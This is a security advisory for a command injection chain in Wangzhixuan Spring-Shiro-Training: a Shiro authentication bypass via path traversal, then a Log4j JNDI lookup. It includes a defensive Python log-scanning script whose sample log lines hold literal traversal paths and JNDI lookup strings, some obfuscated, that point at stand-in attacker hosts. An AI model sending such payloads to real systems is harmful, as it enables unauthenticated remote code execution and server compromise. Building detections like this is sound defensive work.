Wangzhixuan Spring-Shiro-Training Command Injection Vulnerability

Vulnerability

A critical command injection vulnerability has been identified in Wangzhixuan Spring-Shiro-Training up to commit 94812c1fd8f7fe796c931f4984ff1aa0671ab562. The root cause is improper access control in the Apache Shiro filter chain configuration, which leaves certain static paths open to anonymous access. The affected component is the frontend API endpoint '/role/add', which can be reached remotely without authentication. Exploitation is a two-step chain: a path traversal through one of the anonymously accessible static paths bypasses the Shiro authentication filter and reaches the protected endpoint, and the endpoint then hands attacker-controlled input to an unsafe Log4j dependency, whose JNDI lookup is used to execute arbitrary commands.

Impact

Exploitation of this vulnerability allows unauthenticated remote command execution on the server hosting the application, since neither step of the chain requires a valid session.

Reproduction

To reproduce this vulnerability, send a POST request to the '/role/add' endpoint, routing it through one of the anonymously accessible static paths with a path traversal so that the Shiro authentication filter is bypassed. Include in the request a payload that triggers the Log4j vulnerability, such as a JNDI lookup string pointing at an attacker-controlled server, so that the value is logged and the lookup resolves to a command executed on the server.
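As an added example (not part of this advisory and not code from the Spring-Shiro-Training project), the following Python triage script runs over constructed access-log lines the two checks a responder would want for this chain: requests whose literal path sits under an anonymous prefix but canonicalise to a protected path such as '/role/add', and request lines carrying a Log4j JNDI lookup, including the nested-lookup obfuscations (`${${lower:j}ndi:...}`, `${${::-j}ndi:...}`) that defeat a naive `${jndi:` match. The '/static/' prefix is an assumption (the advisory says "certain static paths" without naming them), the log lines and `.invalid` hostnames are constructed, and the traversal forms (`..;/`, `%2e%2e`, double encoding) are the ones an attacker would try against a prefix-based filter chain; the advisory does not say which one the application accepts.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style); NOT captures from
# a real host. Hostnames use the reserved .invalid TLD.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Aug/2025:12:17:01 +0000] "POST /static/..;/role/add HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Aug/2025:12:17:02 +0000] "POST /static/%2e%2e/role/add HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Aug/2025:12:17:03 +0000] "GET /static/css/main.css HTTP/1.1" 200 1024',
    '10.0.0.7 - - [09/Aug/2025:12:17:04 +0000] "POST /role/add HTTP/1.1" 302 0',
    '10.0.0.5 - - [09/Aug/2025:12:17:05 +0000] "POST /role/add?roleName=%24%7Bjndi%3Aldap%3A//attacker.invalid/a%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Aug/2025:12:17:06 +0000] "POST /role/add?roleName=${${lower:j}ndi:rmi://attacker.invalid/x} HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Aug/2025:12:17:07 +0000] "POST /static/..;/role/add?roleName=${${::-j}ndi:ldap://attacker.invalid/b} HTTP/1.1" 200 512',
]

# Assumption: the Shiro filter chain marks everything under /static/ as 'anon'.
# The advisory only says "certain static paths" and does not list them.
ANON_PREFIXES = ("/static/",)

_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
# Innermost Log4j lookups attackers nest to hide the literal 'jndi':
# ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default-value syntax).
_NESTED = [
    (re.compile(r"\$\{\s*lower\s*:\s*([^${}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{\s*upper\s*:\s*([^${}]*)\}", re.I), lambda m: m.group(1).upper()),
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), lambda m: m.group(1)),
]


def normalize_path(raw_target: str) -> str:
    """Canonicalise a request target the way the dispatcher will resolve it:
    drop the query string, percent-decode twice (double encoding), strip ';'
    matrix parameters from every segment, and collapse '.' and '..' segments."""
    path = raw_target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # '..;' -> '..', 'a;jsessionid=x' -> 'a'
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_shiro_bypass(raw_target: str) -> bool:
    """True when the literal target starts under an anonymous prefix (so a
    prefix-matched filter chain skips authc) but canonicalises outside it."""
    literal = raw_target.split("?", 1)[0]
    canonical = normalize_path(raw_target)
    return any(literal.startswith(p) and not canonical.startswith(p) for p in ANON_PREFIXES)


def has_jndi_lookup(text: str) -> bool:
    """Collapse nested Log4j lookups from the inside out, then look for ${jndi:."""
    s = unquote(unquote(text))
    for _ in range(10):  # bounded; stops as soon as nothing collapses
        before = s
        for pat, repl in _NESTED:
            s = pat.sub(repl, s)
        if s == before:
            break
    return bool(_JNDI.search(s))


def analyze_line(line: str) -> list:
    """Return the detection tags that fire for one access-log line."""
    m = _REQ.search(line)
    if not m:
        return []
    tags = []
    if is_shiro_bypass(m.group("target")):
        tags.append("shiro-anon-bypass")
    if has_jndi_lookup(line):
        tags.append("log4j-jndi-lookup")
    return tags


def scan(lines) -> list:
    """(line index, tags) for every line that triggers at least one check."""
    findings = []
    for i, line in enumerate(lines):
        tags = analyze_line(line)
        if tags:
            findings.append((i, tags))
    return findings


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOG):
        print(idx, tags, SAMPLE_LOG[idx])
```

Two caveats when using this on real hosts: an access log only records the request line, so a JNDI string carried in the POST body (the form the reproduction step describes) is visible only to the application log, a request-body-aware WAF, or outbound LDAP/RMI connection monitoring; and a direct unauthenticated POST to '/role/add' that returns 200 rather than a redirect to the login page is itself worth flagging, which the sample's 302 line deliberately does not do.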

Added: Aug 9, 2025, 12:17 PM
Updated: Aug 9, 2025, 12:17 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 10.0
exploitability: 8.7
remediation: 0.0
relevance: 0.3
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.